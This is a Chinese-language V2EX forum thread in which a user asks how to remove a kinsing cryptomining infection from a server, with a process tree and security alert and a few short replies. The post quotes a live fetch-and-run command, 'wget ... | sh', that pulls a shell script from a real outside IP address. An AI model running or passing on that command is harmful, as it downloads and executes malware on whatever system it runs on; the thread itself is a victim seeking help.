V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
V2EX 提问指南
nohello
V2EX  ›  问与答

异常网络连接-主动连接恶意下载源

  •  
  •   nohello · 2020-02-16 12:31:58 +08:00 · 1973 次点击
    这是一个创建于 1744 天前的主题,其中的信息可能已经有所发展或是发生改变。

    好烦躁,服务器被搞了个挖矿程序,弄不掉

    ─php-fpm │ ├─php-fpm ... │ ├─php-fpm ... │ ├─php-fpm ... │ ├─php-fpm ... │ ├─php-fpm ... │ │ └─sh -c wget -q -O - 217.12.221.244/t.sh|sh │ │ ├─sh │ │ └─wget -q -O - 217.12.221.244/t.sh │ ├─php-fpm ... │ ├─php-fpm

    帮我看看这个 sh 搞到哪里的,定时任务全删了,文件 kinsing 也删除了,还是有

    5 条回复    2020-02-27 15:45:55 +08:00
    nohello
        1
    nohello  
    OP
       2020-02-16 12:33:22 +08:00
    该告警由如下引擎检测发现:
    父进程路径:/usr/bin/bash
    父进程命令行:sh -c wget -q -O - 217.12.221.244/t.sh|sh
    父进程 id:6260
    进程 id:6261
    用户名:www
    URL 链接: http://217.12.221.244/t.sh
    进程路径:/usr/bin/wget
    命令行参数:wget -q -O - 217.12.221.244/t.sh
    与该 URL 有关联的漏洞:None
    oott123
        2
    oott123  
       2020-02-16 12:44:49 +08:00
    重装系统
    sujin190
        3
    sujin190  
       2020-02-16 13:17:52 +08:00
    看看谁启动的呗,fpm 启动的那么说明要么你的 PHP 代码被注入了,要么 php-fpm 都被替换了
    seabee
        4
    seabee  
       2020-02-16 23:46:54 +08:00 via Android
    有两个病毒文件,一个是 kinsing,另一个是*fsi 的,网上有方法删
    lipaowang
        5
    lipaowang  
       2020-02-27 15:45:55 +08:00
    楼主你好,这个问题你解决了么,解决方案是什么
    关于   ·   帮助文档   ·   博客   ·   API   ·   FAQ   ·   实用小工具   ·   1037 人在线   最高记录 6679   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 · 21ms · UTC 20:42 · PVG 04:42 · LAX 12:42 · JFK 15:42
    Developed with CodeLauncher
    ♥ Do have faith in what you're doing.